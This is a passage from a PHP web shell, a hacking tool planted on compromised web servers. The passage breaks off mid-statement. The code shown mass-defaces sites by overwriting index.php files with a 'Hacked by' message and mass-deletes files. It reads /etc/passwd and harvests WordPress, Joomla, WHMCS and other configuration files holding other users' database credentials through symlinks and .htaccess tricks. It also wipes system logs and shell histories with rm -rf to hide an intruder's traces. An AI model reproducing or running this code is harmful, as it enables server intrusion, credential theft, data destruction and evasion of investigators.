806. } elseif($dirb === '..') {
807. file_put_contents($lokasi, $isi_script);
808. } else {
809. if(is_dir($dirc)) {
810. if(is_writable($dirc)) {
811. echo "[<font color=lime>DONE</font>] $lokasi<br>";
812. file_put_contents($lokasi, $isi_script);
813. $gans = sabun_massal($dirc,$namafile,$isi_script);
814. }
815. }
816. }
817. }
818. }
819. }
820. function sabun_biasa($dir,$namafile,$isi_script) {
821. if(is_writable($dir)) {
822. $dira = scandir($dir);
823. foreach($dira as $dirb) {
824. $dirc = "$dir/$dirb";
825. $lokasi = $dirc.'/'.$namafile;
826. if($dirb === '.') {
827. file_put_contents($lokasi, $isi_script);
828. } elseif($dirb === '..') {
829. file_put_contents($lokasi, $isi_script);
830. } else {
831. if(is_dir($dirc)) {
832. if(is_writable($dirc)) {
833. echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
834. file_put_contents($lokasi, $isi_script);
835. }
836. }
837. }
838. }
839. }
840. }
841. if($_POST['start']) {
842. if($_POST['tipe_sabun'] == 'mahal') {
843. echo "<div style='margin: 5px auto; padding: 5px'>";
844. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
845. echo "</div>";
846. } elseif($_POST['tipe_sabun'] == 'murah') {
847. echo "<div style='margin: 5px auto; padding: 5px'>";
848. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
849. echo "</div>";
850. }
851. } else {
852. echo "<center>";
853. echo "<form method='post'>
854. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
855. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
856. <font style='text-decoration: underline;'>Folder:</font><br>
857. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
858. <font style='text-decoration: underline;'>Filename:</font><br>
859. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
860. <font style='text-decoration: underline;'>Index File:</font><br>
861. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by KID2ZON3</textarea><br>
862. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
863. </form></center>";
864. }
865. } elseif($_GET['do'] == 'mass_delete') {
866. function hapus_massal($dir,$namafile) {
867. if(is_writable($dir)) {
868. $dira = scandir($dir);
869. foreach($dira as $dirb) {
870. $dirc = "$dir/$dirb";
871. $lokasi = $dirc.'/'.$namafile;
872. if($dirb === '.') {
873. if(file_exists("$dir/$namafile")) {
874. unlink("$dir/$namafile");
875. }
876. } elseif($dirb === '..') {
877. if(file_exists("".dirname($dir)."/$namafile")) {
878. unlink("".dirname($dir)."/$namafile");
879. }
880. } else {
881. if(is_dir($dirc)) {
882. if(is_writable($dirc)) {
883. if(file_exists($lokasi)) {
884. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
885. unlink($lokasi);
886. $gans = hapus_massal($dirc,$namafile);
887. }
888. }
889. }
890. }
891. }
892. }
893. }
894. if($_POST['start']) {
895. echo "<div style='margin: 5px auto; padding: 5px'>";
896. hapus_massal($_POST['d_dir'], $_POST['d_file']);
897. echo "</div>";
898. } else {
899. echo "<center>";
900. echo "<form method='post'>
901. <font style='text-decoration: underline;'>Folder:</font><br>
902. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
903. <font style='text-decoration: underline;'>Filename:</font><br>
904. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
905. <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
906. </form></center>";
907. }
908. }
909. elseif($_GET['do'] == 'configgrab') {
910. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
911. echo '<script>alert("Tidak bisa di gunakan di server windows")</script>';
912. exit;
913. }
914. if($_POST){ if($_POST['config'] == 'symvhosts') {
915. @mkdir("gans_symvhosts", 0777);
916. exe("ln -s / gans_symvhosts/root");
917. $htaccess="Options Indexes FollowSymLinks
918. DirectoryIndex gans.html
919. AddType text/plain .php
920. AddHandler text/plain .php
921. Satisfy Any";
922. @file_put_contents("gans_symvhosts/.htaccess",$htaccess);
923. $etc_passwd=$_POST['passwd'];
924.  
925. $etc_passwd=explode("\n",$etc_passwd);
926. foreach($etc_passwd as $passwd){
927. $pawd=explode(":",$passwd);
928. $user =$pawd[5];
929. $gans = preg_replace('/\/var\/www\/vhosts\//', '', $user);
930. if (preg_match('/vhosts/i',$user)){
931. exe("ln -s ".$user."/httpdocs/wp-config.php gans_symvhosts/".$gans."-Wordpress.txt");
932. exe("ln -s ".$user."/httpdocs/configuration.php gans_symvhosts/".$gans."-Joomla.txt");
933. exe("ln -s ".$user."/httpdocs/config/koneksi.php gans_symvhosts/".$gans."-Lokomedia.txt");
934. exe("ln -s ".$user."/httpdocs/forum/config.php gans_symmvhosts/".$gans."-phpBB.txt");
935. exe("ln -s ".$user."/httpdocs/sites/default/settings.php gans_symvhosts/".$gans."-Drupal.txt");
936. exe("ln -s ".$user."/httpdocs/config/settings.inc.php gans_symvhosts/".$gans."-PrestaShop.txt");
937. exe("ln -s ".$user."/httpdocs/app/etc/local.xml gans_symvhosts/".$gans."-Magento.txt");
938. exe("ln -s ".$user."/httpdocs/admin/config.php gans_symvhosts/".$gans."-OpenCart.txt");
939. exe("ln -s ".$user."/httpdocs/application/config/database.php gans_symvhosts/".$gans."-Ellislab.txt");
940. }}}
941. if($_POST['config'] == 'symlink') {
942. @mkdir("gans_symconfig", 0777);
943. @symlink("/","gans_symconfig/root");
944. $htaccess="Options Indexes FollowSymLinks
945. DirectoryIndex gans.html
946. AddType text/plain .php
947. AddHandler text/plain .php
948. Satisfy Any";
949. @file_put_contents("gans_symconfig/.htaccess",$htaccess);}
950. if($_POST['config'] == '404') {
951. @mkdir("gans_sym404", 0777);
952. @symlink("/","gans_sym404/root");
953. $htaccess="Options Indexes FollowSymLinks
954. DirectoryIndex gans.html
955. AddType text/plain .php
956. AddHandler text/plain .php
957. Satisfy Any
958. IndexOptions +Charset=UTF-8 +FancyIndexing +IgnoreCase +FoldersFirst +XHTML +HTMLTable +SuppressRules +SuppressDescription +NameWidth=*
959. IndexIgnore *.txt404
960. RewriteEngine On
961. RewriteCond %{REQUEST_FILENAME} ^.*gans_sym404 [NC]
962. RewriteRule \.txt$ %{REQUEST_URI}404 [L,R=302.NC]";
963. @file_put_contents("gans_sym404/.htaccess",$htaccess);
964. }
965. if($_POST['config'] == 'grab') {
966. mkdir("gans_configgrab", 0777);
967. $isi_htc = "Options all\nRequire None\nSatisfy Any";
968. $htc = fopen("gans_configgrab/.htaccess","w");
969. fwrite($htc, $isi_htc);
970. }
971. $passwd = $_POST['passwd'];
972.  
973. preg_match_all('/(.*?):x:/', $passwd, $user_config);
974. foreach($user_config[1] as $user_gans) {
975. $grab_config = array(
976. "/home/$user_gans/.accesshash" => "WHM-accesshash",
977. "/home/$user_gans/public_html/config/koneksi.php" => "Lokomedia",
978. "/home/$user_gans/public_html/forum/config.php" => "phpBB",
979. "/home/$user_gans/public_html/sites/default/settings.php" => "Drupal",
980. "/home/$user_gans/public_html/config/settings.inc.php" => "PrestaShop",
981. "/home/$user_gans/public_html/app/etc/local.xml" => "Magento",
982. "/home/$user_gans/public_html/admin/config.php" => "OpenCart",
983. "/home/$user_gans/public_html/application/config/database.php" => "Ellislab",
984. "/home/$user_gans/public_html/vb/includes/config.php" => "Vbulletin",
985. "/home/$user_gans/public_html/includes/config.php" => "Vbulletin",
986. "/home/$user_gans/public_html/forum/includes/config.php" => "Vbulletin",
987. "/home/$user_gans/public_html/forums/includes/config.php" => "Vbulletin",
988. "/home/$user_gans/public_html/cc/includes/config.php" => "Vbulletin",
989. "/home/$user_gans/public_html/inc/config.php" => "MyBB",
990. "/home/$user_gans/public_html/includes/configure.php" => "OsCommerce",
991. "/home/$user_gans/public_html/shop/includes/configure.php" => "OsCommerce",
992. "/home/$user_gans/public_html/os/includes/configure.php" => "OsCommerce",
993. "/home/$user_gans/public_html/oscom/includes/configure.php" => "OsCommerce",
994. "/home/$user_gans/public_html/products/includes/configure.php" => "OsCommerce",
995. "/home/$user_gans/public_html/cart/includes/configure.php" => "OsCommerce",
996. "/home/$user_gans/public_html/inc/conf_global.php" => "IPB",
997. "/home/$user_gans/public_html/wp-config.php" => "Wordpress",
998. "/home/$user_gans/public_html/wp/test/wp-config.php" => "Wordpress",
999. "/home/$user_gans/public_html/blog/wp-config.php" => "Wordpress",
1000. "/home/$user_gans/public_html/beta/wp-config.php" => "Wordpress",
1001. "/home/$user_gans/public_html/portal/wp-config.php" => "Wordpress",
1002. "/home/$user_gans/public_html/site/wp-config.php" => "Wordpress",
1003. "/home/$user_gans/public_html/wp/wp-config.php" => "Wordpress",
1004. "/home/$user_gans/public_html/WP/wp-config.php" => "Wordpress",
1005. "/home/$user_gans/public_html/news/wp-config.php" => "Wordpress",
1006. "/home/$user_gans/public_html/wordpress/wp-config.php" => "Wordpress",
1007. "/home/$user_gans/public_html/test/wp-config.php" => "Wordpress",
1008. "/home/$user_gans/public_html/demo/wp-config.php" => "Wordpress",
1009. "/home/$user_gans/public_html/home/wp-config.php" => "Wordpress",
1010. "/home/$user_gans/public_html/v1/wp-config.php" => "Wordpress",
1011. "/home/$user_gans/public_html/v2/wp-config.php" => "Wordpress",
1012. "/home/$user_gans/public_html/press/wp-config.php" => "Wordpress",
1013. "/home/$user_gans/public_html/new/wp-config.php" => "Wordpress",
1014. "/home/$user_gans/public_html/blogs/wp-config.php" => "Wordpress",
1015. "/home/$user_gans/public_html/configuration.php" => "Joomla",
1016. "/home/$user_gans/public_html/blog/configuration.php" => "Joomla",
1017. "/home/$user_gans/public_html/submitticket.php" => "^WHMCS",
1018. "/home/$user_gans/public_html/cms/configuration.php" => "Joomla",
1019. "/home/$user_gans/public_html/beta/configuration.php" => "Joomla",
1020. "/home/$user_gans/public_html/portal/configuration.php" => "Joomla",
1021. "/home/$user_gans/public_html/site/configuration.php" => "Joomla",
1022. "/home/$user_gans/public_html/main/configuration.php" => "Joomla",
1023. "/home/$user_gans/public_html/home/configuration.php" => "Joomla",
1024. "/home/$user_gans/public_html/demo/configuration.php" => "Joomla",
1025. "/home/$user_gans/public_html/test/configuration.php" => "Joomla",
1026. "/home/$user_gans/public_html/v1/configuration.php" => "Joomla",
1027. "/home/$user_gans/public_html/v2/configuration.php" => "Joomla",
1028. "/home/$user_gans/public_html/joomla/configuration.php" => "Joomla",
1029. "/home/$user_gans/public_html/new/configuration.php" => "Joomla",
1030. "/home/$user_gans/public_html/WHMCS/submitticket.php" => "WHMCS",
1031. "/home/$user_gans/public_html/whmcs1/submitticket.php" => "WHMCS",
1032. "/home/$user_gans/public_html/Whmcs/submitticket.php" => "WHMCS",
1033. "/home/$user_gans/public_html/whmcs/submitticket.php" => "WHMCS",
1034. "/home/$user_gans/public_html/whmcs/submitticket.php" => "WHMCS",
1035. "/home/$user_gans/public_html/WHMC/submitticket.php" => "WHMCS",
1036. "/home/$user_gans/public_html/Whmc/submitticket.php" => "WHMCS",
1037. "/home/$user_gans/public_html/whmc/submitticket.php" => "WHMCS",
1038. "/home/$user_gans/public_html/WHM/submitticket.php" => "WHMCS",
1039. "/home/$user_gans/public_html/Whm/submitticket.php" => "WHMCS",
1040. "/home/$user_gans/public_html/whm/submitticket.php" => "WHMCS",
1041. "/home/$user_gans/public_html/HOST/submitticket.php" => "WHMCS",
1042. "/home/$user_gans/public_html/Host/submitticket.php" => "WHMCS",
1043. "/home/$user_gans/public_html/host/submitticket.php" => "WHMCS",
1044. "/home/$user_gans/public_html/SUPPORTES/submitticket.php" => "WHMCS",
1045. "/home/$user_gans/public_html/Supportes/submitticket.php" => "WHMCS",
1046. "/home/$user_gans/public_html/supportes/submitticket.php" => "WHMCS",
1047. "/home/$user_gans/public_html/domains/submitticket.php" => "WHMCS",
1048. "/home/$user_gans/public_html/domain/submitticket.php" => "WHMCS",
1049. "/home/$user_gans/public_html/Hosting/submitticket.php" => "WHMCS",
1050. "/home/$user_gans/public_html/HOSTING/submitticket.php" => "WHMCS",
1051. "/home/$user_gans/public_html/hosting/submitticket.php" => "WHMCS",
1052. "/home/$user_gans/public_html/CART/submitticket.php" => "WHMCS",
1053. "/home/$user_gans/public_html/Cart/submitticket.php" => "WHMCS",
1054. "/home/$user_gans/public_html/cart/submitticket.php" => "WHMCS",
1055. "/home/$user_gans/public_html/ORDER/submitticket.php" => "WHMCS",
1056. "/home/$user_gans/public_html/Order/submitticket.php" => "WHMCS",
1057. "/home/$user_gans/public_html/order/submitticket.php" => "WHMCS",
1058. "/home/$user_gans/public_html/CLIENT/submitticket.php" => "WHMCS",
1059. "/home/$user_gans/public_html/Client/submitticket.php" => "WHMCS",
1060. "/home/$user_gans/public_html/client/submitticket.php" => "WHMCS",
1061. "/home/$user_gans/public_html/CLIENTAREA/submitticket.php" => "WHMCS",
1062. "/home/$user_gans/public_html/Clientarea/submitticket.php" => "WHMCS",
1063. "/home/$user_gans/public_html/clientarea/submitticket.php" => "WHMCS",
1064. "/home/$user_gans/public_html/SUPPORT/submitticket.php" => "WHMCS",
1065. "/home/$user_gans/public_html/Support/submitticket.php" => "WHMCS",
1066. "/home/$user_gans/public_html/support/submitticket.php" => "WHMCS",
1067. "/home/$user_gans/public_html/BILLING/submitticket.php" => "WHMCS",
1068. "/home/$user_gans/public_html/Billing/submitticket.php" => "WHMCS",
1069. "/home/$user_gans/public_html/billing/submitticket.php" => "WHMCS",
1070. "/home/$user_gans/public_html/BUY/submitticket.php" => "WHMCS",
1071. "/home/$user_gans/public_html/Buy/submitticket.php" => "WHMCS",
1072. "/home/$user_gans/public_html/buy/submitticket.php" => "WHMCS",
1073. "/home/$user_gans/public_html/MANAGE/submitticket.php" => "WHMCS",
1074. "/home/$user_gans/public_html/Manage/submitticket.php" => "WHMCS",
1075. "/home/$user_gans/public_html/manage/submitticket.php" => "WHMCS",
1076. "/home/$user_gans/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS",
1077. "/home/$user_gans/public_html/ClientSupport/submitticket.php" => "WHMCS",
1078. "/home/$user_gans/public_html/Clientsupport/submitticket.php" => "WHMCS",
1079. "/home/$user_gans/public_html/clientsupport/submitticket.php" => "WHMCS",
1080. "/home/$user_gans/public_html/CHECKOUT/submitticket.php" => "WHMCS",
1081. "/home/$user_gans/public_html/Checkout/submitticket.php" => "WHMCS",
1082. "/home/$user_gans/public_html/checkout/submitticket.php" => "WHMCS",
1083. "/home/$user_gans/public_html/BILLINGS/submitticket.php" => "WHMCS",
1084. "/home/$user_gans/public_html/Billings/submitticket.php" => "WHMCS",
1085. "/home/$user_gans/public_html/billings/submitticket.php" => "WHMCS",
1086. "/home/$user_gans/public_html/BASKET/submitticket.php" => "WHMCS",
1087. "/home/$user_gans/public_html/Basket/submitticket.php" => "WHMCS",
1088. "/home/$user_gans/public_html/basket/submitticket.php" => "WHMCS",
1089. "/home/$user_gans/public_html/SECURE/submitticket.php" => "WHMCS",
1090. "/home/$user_gans/public_html/Secure/submitticket.php" => "WHMCS",
1091. "/home/$user_gans/public_html/secure/submitticket.php" => "WHMCS",
1092. "/home/$user_gans/public_html/SALES/submitticket.php" => "WHMCS",
1093. "/home/$user_gans/public_html/Sales/submitticket.php" => "WHMCS",
1094. "/home/$user_gans/public_html/sales/submitticket.php" => "WHMCS",
1095. "/home/$user_gans/public_html/BILL/submitticket.php" => "WHMCS",
1096. "/home/$user_gans/public_html/Bill/submitticket.php" => "WHMCS",
1097. "/home/$user_gans/public_html/bill/submitticket.php" => "WHMCS",
1098. "/home/$user_gans/public_html/PURCHASE/submitticket.php" => "WHMCS",
1099. "/home/$user_gans/public_html/Purchase/submitticket.php" => "WHMCS",
1100. "/home/$user_gans/public_html/purchase/submitticket.php" => "WHMCS",
1101. "/home/$user_gans/public_html/ACCOUNT/submitticket.php" => "WHMCS",
1102. "/home/$user_gans/public_html/Account/submitticket.php" => "WHMCS",
1103. "/home/$user_gans/public_html/account/submitticket.php" => "WHMCS",
1104. "/home/$user_gans/public_html/USER/submitticket.php" => "WHMCS",
1105. "/home/$user_gans/public_html/User/submitticket.php" => "WHMCS",
1106. "/home/$user_gans/public_html/user/submitticket.php" => "WHMCS",
1107. "/home/$user_gans/public_html/CLIENTS/submitticket.php" => "WHMCS",
1108. "/home/$user_gans/public_html/Clients/submitticket.php" => "WHMCS",
1109. "/home/$user_gans/public_html/clients/submitticket.php" => "WHMCS",
1110. "/home/$user_gans/public_html/BILLINGS/submitticket.php" => "WHMCS",
1111. "/home/$user_gans/public_html/Billings/submitticket.php" => "WHMCS",
1112. "/home/$user_gans/public_html/billings/submitticket.php" => "WHMCS",
1113. "/home/$user_gans/public_html/MY/submitticket.php" => "WHMCS",
1114. "/home/$user_gans/public_html/My/submitticket.php" => "WHMCS",
1115. "/home/$user_gans/public_html/my/submitticket.php" => "WHMCS",
1116. "/home/$user_gans/public_html/secure/whm/submitticket.php" => "WHMCS",
1117. "/home/$user_gans/public_html/secure/whmcs/submitticket.php" => "WHMCS",
1118. "/home/$user_gans/public_html/panel/submitticket.php" => "WHMCS",
1119. "/home/$user_gans/public_html/clientes/submitticket.php" => "WHMCS",
1120. "/home/$user_gans/public_html/cliente/submitticket.php" => "WHMCS",
1121. "/home/$user_gans/public_html/support/order/submitticket.php" => "WHMCS",
1122. "/home/$user_gans/public_html/bb-config.php" => "BoxBilling",
1123. "/home/$user_gans/public_html/boxbilling/bb-config.php" => "BoxBilling",
1124. "/home/$user_gans/public_html/box/bb-config.php" => "BoxBilling",
1125. "/home/$user_gans/public_html/host/bb-config.php" => "BoxBilling",
1126. "/home/$user_gans/public_html/Host/bb-config.php" => "BoxBilling",
1127. "/home/$user_gans/public_html/supportes/bb-config.php" => "BoxBilling",
1128. "/home/$user_gans/public_html/support/bb-config.php" => "BoxBilling",
1129. "/home/$user_gans/public_html/hosting/bb-config.php" => "BoxBilling",
1130. "/home/$user_gans/public_html/cart/bb-config.php" => "BoxBilling",
1131. "/home/$user_gans/public_html/order/bb-config.php" => "BoxBilling",
1132. "/home/$user_gans/public_html/client/bb-config.php" => "BoxBilling",
1133. "/home/$user_gans/public_html/clients/bb-config.php" => "BoxBilling",
1134. "/home/$user_gans/public_html/cliente/bb-config.php" => "BoxBilling",
1135. "/home/$user_gans/public_html/clientes/bb-config.php" => "BoxBilling",
1136. "/home/$user_gans/public_html/billing/bb-config.php" => "BoxBilling",
1137. "/home/$user_gans/public_html/billings/bb-config.php" => "BoxBilling",
1138. "/home/$user_gans/public_html/my/bb-config.php" => "BoxBilling",
1139. "/home/$user_gans/public_html/secure/bb-config.php" => "BoxBilling",
1140. "/home/$user_gans/public_html/support/order/bb-config.php" => "BoxBilling",
1141. "/home/$user_gans/public_html/includes/dist-configure.php" => "Zencart",
1142. "/home/$user_gans/public_html/zencart/includes/dist-configure.php" => "Zencart",
1143. "/home/$user_gans/public_html/products/includes/dist-configure.php" => "Zencart",
1144. "/home/$user_gans/public_html/cart/includes/dist-configure.php" => "Zencart",
1145. "/home/$user_gans/public_html/shop/includes/dist-configure.php" => "Zencart",
1146. "/home/$user_gans/public_html/includes/iso4217.php" => "Hostbills",
1147. "/home/$user_gans/public_html/hostbills/includes/iso4217.php" => "Hostbills",
1148. "/home/$user_gans/public_html/host/includes/iso4217.php" => "Hostbills",
1149. "/home/$user_gans/public_html/Host/includes/iso4217.php" => "Hostbills",
1150. "/home/$user_gans/public_html/supportes/includes/iso4217.php" => "Hostbills",
1151. "/home/$user_gans/public_html/support/includes/iso4217.php" => "Hostbills",
1152. "/home/$user_gans/public_html/hosting/includes/iso4217.php" => "Hostbills",
1153. "/home/$user_gans/public_html/cart/includes/iso4217.php" => "Hostbills",
1154. "/home/$user_gans/public_html/order/includes/iso4217.php" => "Hostbills",
1155. "/home/$user_gans/public_html/client/includes/iso4217.php" => "Hostbills",
1156. "/home/$user_gans/public_html/clients/includes/iso4217.php" => "Hostbills",
1157. "/home/$user_gans/public_html/cliente/includes/iso4217.php" => "Hostbills",
1158. "/home/$user_gans/public_html/clientes/includes/iso4217.php" => "Hostbills",
1159. "/home/$user_gans/public_html/billing/includes/iso4217.php" => "Hostbills",
1160. "/home/$user_gans/public_html/billings/includes/iso4217.php" => "Hostbills",
1161. "/home/$user_gans/public_html/my/includes/iso4217.php" => "Hostbills",
1162. "/home/$user_gans/public_html/secure/includes/iso4217.php" => "Hostbills",
1163. "/home/$user_gans/public_html/support/order/includes/iso4217.php" => "Hostbills"
1164. );
1165.  
1166. foreach($grab_config as $config => $nama_config) {
1167. if($_POST['config'] == 'grab') {
1168. $ambil_config = file_get_contents($config);
1169. if($ambil_config == '') {
1170. } else {
1171. $file_config = fopen("hgt_configgrab/$user_gans-$nama_config.txt","w");
1172. fputs($file_config,$ambil_config);
1173. }
1174. }
1175. if($_POST['config'] == 'symlink') {
1176. @symlink($config,"gans_symconfig/".$user_hgt."-".$nama_config.".txt");
1177. }
1178. if($_POST['config'] == '404') {
1179. $sym404=symlink($config,"gans_sym/".$user_hgt."-".$nama_config.".txt");
1180. if($sym404){
1181. @mkdir("gans_sym404/".$user_hgt."-".$nama_config.".txt404", 0777);
1182. $htaccess="Options Indexes FollowSymLinks
1183. DirectoryIndex hgt.html
1184. HeaderName hgt.txt
1185. Satisfy Any
1186. IndexOptions IgnoreCase FancyIndexing FoldersFirst NameWidth=* DescriptionWidth=* SuppressHTMLPreamble
1187. IndexIgnore *";
1188.  
1189. @file_put_contents("gans_sym404/".$user_hgt."-".$nama_config.".txt404/.htaccess",$htaccess);
1190.  
1191. @symlink($config,"gans_sym404/".$user_hgt."-".$nama_config.".txt404/hgt.txt");
1192.  
1193. }
1194.  
1195. }
1196.  
1197. }
1198. } if($_POST['config'] == 'grab') {
1199. echo "<center><a href='?path=$path/hgt_configgrab'><font color=lime>Done</font></a></center>";
1200. }
1201. if($_POST['config'] == '404') {
1202. echo "<center>
1203. <a href=\"gans_sym404/root/\">Symlinknya</a>
1204. <br><a href=\"gans_sym404/\">Configurations</a></center>";
1205. }
1206. if($_POST['config'] == 'symlink') {
1207. echo "<center>
1208. <a href=\"gans_symconfig/root/\">Symlinknya</a>
1209. <br><a href=\"gans_symconfig/\">Configurations</a></center>";
1210. }if($_POST['config'] == 'symvhost') {
1211. echo "<center>
1212. <a href=\"gans_symvhost/root/\">Root Server</a>
1213. <br><a href=\"gans_symvhost/\">Configurations</a></center>";
1214. }
1215.  
1216.  
1217. }else{
1218. echo "<form method=\"post\" action=\"\"><center>
1219. </center></select><br><textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
1220. echo include("/etc/passwd");
1221. echo "</textarea><br><br><center>
1222. <select class=\"select\" name=\"config\" style=\"width: 450px;\" height=\"10\">
1223. <option value=\"grab\">Config Grab</option>
1224. <option value=\"symlink\">Symlink Config</option>
1225. <option value=\"404\">Config 404</option>
1226. <option value=\"symvhosts\">Vhosts Config Grabber</option><br><br><input type=\"submit\" value=\"Start!!\"></td></tr></center>\n";
1227. }
1228. }
1229. elseif($_GET['do'] == 'delogs') {
1230. echo '<center><b><span>Delete Logs ( For Safety can be fun = Supported By Fiesta :v )</span></b><center><br>';
1231. echo "<table style='margin: 0 auto;'><tr valign='top'><td align='left'>";
1232. exec("rm -rf /tmp/logs");
1233. exec("rm -rf /root/.ksh_history");
1234. exec("rm -rf /root/.bash_history");
1235. exec("rm -rf /root/.bash_logout");
1236. exec("rm -rf /usr/local/apache/logs");
1237. exec("rm -rf /usr/local/apache/log");
1238. exec("rm -rf /var/apache/logs");
1239. exec("rm -rf /var/apache/log");
1240. exec("rm -rf /var/run/utmp");
1241. exec("rm -rf /var/logs");
1242. exec("rm -rf /var/log");
1243. exec("rm -rf /var/adm");
1244. exec("rm -rf /etc/wtmp");
1245. exec("rm -rf /etc/utmp");
1246. exec("rm -rf $HISTFILE");
1247. exec("rm -rf /var/log/lastlog");
1248. exec("rm -rf /var/log/wtmp");
1249.  
1250. shell_exec("rm -rf /tmp/logs");
1251. shell_exec("rm -rf /root/.ksh_history");
1252. shell_exec("rm -rf /root/.bash_history");
1253. shell_exec("rm -rf /root/.bash_logout");
1254. shell_exec("rm -rf /usr/local/apache/logs");
1255. shell_exec("rm -rf /usr/local/apache/log");
1256. shell_exec("rm -rf /var/apache/logs");
1257. shell_exec("rm -rf /var/apache/log");
1258. shell_exec("rm -rf /var/run/utmp");
1259. shell_exec("rm -rf /var/logs");
1260. shell_exec("rm -rf /var/log");
1261. shell_exec("rm -rf /var/adm");
1262. shell_exec("rm -rf /etc/wtmp");
1263. shell_exec("rm -rf /etc/utmp");
1264. shell_exec("rm -rf $HISTFILE");
1265. shell_exec("rm -rf /var/log/lastlog");
1266. shell_exec("rm -rf /var/log/wtmp");
1267.  
1268. passthru("rm -rf /tmp/logs");
1269. passthru("rm -rf /root/.ksh_history");
1270. passthru("rm -rf /root/.bash_history");
1271. passthru("rm -rf /root/.bash_logout");
1272. passthru("rm -rf /usr/local/apache/logs");
1273. passthru("rm -rf /usr/local/apache/log");
1274. passthru("rm -rf /var/apache/logs");
1275. passthru("rm -rf /var/apache/log");
1276. passthru("rm -rf /var/run/utmp");
1277. passthru("rm -rf /var/logs");
1278. passthru("rm -rf /var/log");
1279. passthru("rm -rf /var/adm");
1280. passthru("rm -rf /etc/wtmp");
1281. passthru("rm -rf /etc/utmp");
1282. passthru("rm -rf $HISTFILE");
1283. passthru("rm -rf /var/log/lastlog");
1284. passthru("rm -rf /var/log/wtmp");
1285.  
1286.  
1287. system("rm -rf /tmp/logs");
1288. sleep(2);
1289. echo'<br>Deleting .../tmp/logs ';
1290. sleep(2);
1291.  
1292. system("rm -rf /root/.bash_history");
1293. sleep(2);
1294. echo'<p>Deleting .../root/.bash_history </p>';
1295.  
1296. system("rm -rf /root/.ksh_history");
1297. sleep(2);
1298. echo'<p>Deleting .../root/.ksh_history </p>';
1299.  
1300. system("rm -rf /root/.bash_logout");
1301. sleep(2);
1302. echo'<p>Deleting .../root/.bash_logout </p>';
1303.  
1304. system("rm -rf /usr/local/apache/logs");
1305. sleep(2);
1306. echo'<p>Deleting .../usr/local/apache/logs </p>';
1307.  
1308. system("rm -rf /usr/local/apache/log");
1309. sleep(2);
1310. echo'<p>Deleting .../usr/local/apache/log </p>';
1311.  
1312. system("rm -rf /var/apache/logs");
1313. sleep(2);
1314. echo'<p>Deleting .../var/apache/logs </p>';
1315.  
1316. system("rm -rf /var/apache/log");
1317. sleep(2);
1318. echo'<p>Deleting .../var/apache/log </p>';
1319.  
1320. system("rm -rf /var/run/utmp");
1321. sleep(2);
1322. echo'<p>Deleting .../var/run/utmp </p>';
1323.  
1324. system("rm -rf /var/logs");
1325. sleep(2);
1326. echo'<p>Deleting .../var/logs </p>';
1327.  
1328. system("rm -rf /var/log");
1329. sleep(2);
1330. echo'<p>Deleting .../var/log </p>';
1331.  
1332. system("rm -rf /var/adm");
1333. sleep(2);
1334. echo'<p>Deleting .../var/adm </p>';
1335.  
1336. system("rm -rf /etc/wtmp");
1337. sleep(2);
1338. echo'<p>Deleting .../etc/wtmp </p>';
1339.  
1340. system("rm -rf /etc/utmp");
1341. sleep(2);
1342. echo'<p>Deleting .../etc/utmp </p>';
1343.  
1344. system("rm -rf $HISTFILE");
1345. sleep(2);
1346. echo'<p>Deleting ...$HISTFILE </p>';
1347.  
1348. system("rm -rf /var/log/lastlog");
1349. sleep(2);
1350. echo'<p>Deleting .../var/log/lastlog </p>';
1351.  
1352. system("rm -rf /var/log/wtmp");
1353. sleep(2);
1354. echo'<p>Deleting .../var/log/wtmp </p>';
1355.  
1356. sleep(4);
1357.  
1358. echo '<br><p><i>Your Traces Has Been Successfully Deleting ...From the Server</i></p>';
1359. echo"</td></tr></table>";
1360. }
1361. elseif($_GET['do'] == 'symlink') {
1362. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
1363. $d0mains = @file("/etc/named.conf");
1364. ##htaccess
1365. if($d0mains){
1366. @mkdir("gans_sym",0777);
1367. @chdir("gans_sym");
1368. @exe("ln -s / root");
1369. $file3 = 'Options Indexes FollowSymLinks
1370. DirectoryIndex hgt.html
1371. AddType text/plain .php
1372. AddHandler text/plain .php
1373. Satisfy Any';
1374. $fp3 = fopen('.htaccess','w');
1375. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
1376. echo "<br>
1377. <table align=center border=1 style='width:80%;border-color:#333333;'>
1378. <tr>
1379. <td align=center><font size=2>No.</font></td>
1380. <td align=center><font size=2>Domains</font></td>
1381. <td align=center><font size=2>Users</font></td>
1382. <td align=center><font size=2>Symlink</font></td>
1383. </tr>";
1384. $dcount = 1;
1385. foreach($d0mains as $d0main){
1386. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
1387. flush();
1388. if(strlen(trim($domains[1][0])) > 2){
1389. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1390. echo "<tr align=center>
1391. <td><font size=2>" . $dcount . "</font></td>
1392. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
1393. <td>".$user['name']."</td>
1394. <td><a href='$full/gans_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td>
1395. </tr>";
1396. flush();
1397. $dcount++;}}}
1398. echo "</table>";
1399. }else{
1400. $TEST=@file('/etc/passwd');
1401. if ($TEST){
1402. @mkdir("gans_sym",0777);
1403. @chdir("gans_sym");
1404. exe("ln -s / root");
1405. $file3 = 'Options Indexes FollowSymLinks
1406. DirectoryIndex hgt.html
1407. AddType text/plain .php
1408. AddHandler text/plain .php
1409. Satisfy Any';
1410. $fp3 = fopen('.htaccess','w');
1411. $fw3 = fwrite($fp3,$file3);
1412. @fclose($fp3);
1413. echo "
